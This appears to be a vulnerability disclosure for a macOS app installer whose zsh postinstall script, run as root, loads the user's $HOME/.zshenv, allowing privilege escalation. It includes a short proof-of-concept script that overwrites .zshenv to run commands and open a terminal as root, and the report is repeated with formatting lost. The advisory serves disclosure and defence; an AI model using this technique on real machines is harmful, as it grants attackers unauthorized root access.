Summary
It's possible to abuse a vulnerability inside the postinstall installer script to make the installer execute arbitrary code as root.
Details
The cause of the vulnerability is the fact that the shebang #!/bin/zsh is being used. When the installer is executed it asks for the users password to be executed as root. However, it'll still be using the $HOME of the user and therefore loading the file $HOME/.zshenv when the postinstall script is executed.
An attacker could add malicious code to $HOME/.zshenv and it will be executed when the app is installed.
PoC
The following script will add some "malicious" code to $HOME/.zshenv:
#!/bin/bash
# Prepare the execution of the payload
cp "$HOME/.zshenv" "$HOME/.zshenv.old"
cat > "$HOME/.zshenv" << EOF
if [[ \$EUID -eq 0 ]]; then
whoami > /tmp/whoami
/Applications/iTerm.app/Contents/MacOS/iTerm2 &
fi
EOF
Then just execute the installer and you should find the file /tmp/whoami with the content root and an iTerm shell executed as root.
Impact
Privilege escalation to root.
carlospolop Reporter
Summary
It's possible to abuse a vulnerability inside the postinstall installer script to make the installer execute arbitrary code as root.
Details
The cause of the vulnerability is the fact that the shebang
#!/bin/zshis being used. When the installer is executed it asks for the users password to be executed as root. However, it'll still be using the $HOME of the user and therefore loading the file$HOME/.zshenvwhen thepostinstallscript is executed.An attacker could add malicious code to
$HOME/.zshenvand it will be executed when the app is installed.PoC
The following script will add some "malicious" code to
$HOME/.zshenv:Then just execute the installer and you should find the file
/tmp/whoamiwith the contentrootand an iTerm shell executed as root.Impact
Privilege escalation to root.